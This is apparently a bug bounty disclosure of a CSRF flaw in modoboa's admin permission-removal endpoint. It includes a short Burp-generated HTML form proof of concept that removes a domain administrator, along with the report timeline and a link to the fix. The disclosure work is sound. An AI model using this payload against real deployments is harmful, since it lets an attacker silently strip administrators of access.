CSRF leading to remove Administrators users in modoboa/modoboa
Valid
Reported on
Jan 21st 2023
Description
remove function is vulnerable to CSRF lead to remove any Administrators users GET /admin/permissions/remove/?domid=2&daid=15
Proof of Concept
1/ visit /admin/domains/1/
2/ delete button to remove permission is vulnerable to CSRF
https://drive.google.com/file/d/1fs_2MID6uT_f7rvjJQYK_m-e6q39PMez/view?usp=sharing
3 visit POC by changing value will remove administrator username
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https//l27.0.0.1/admin/permissions/remove/">
<input type="hidden" name="domid" value="2" />
<input type="hidden" name="daid" value="15" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Referance
cause the same by deleting the administrative username in
https://huntr.dev/bounties/0a852351-00ed-44d2-a650-9055b7beed58/
https://huntr.dev/bounties/d7007f76-3dbc-48a7-a2fb-377040fe100c/
Impact
Allows an attacker to induce users to perform actions that they do not intend to perform
Occurrences
We are processing your report and will contact the
modoboa
team within 24 hours.
4 months ago
0ozero0 modified the report
4 months ago
0ozero0 modified the report
4 months ago
We have contacted a member of the
modoboa
team and are waiting to hear back
4 months ago
The researcher's credibility has increased: +7
Here is a fix: https://github.com/modoboa/modoboa/pull/2758
The fix bounty has been dropped
This vulnerability has been assigned a CVE
domain.py#L2
has been validated
to join this conversation
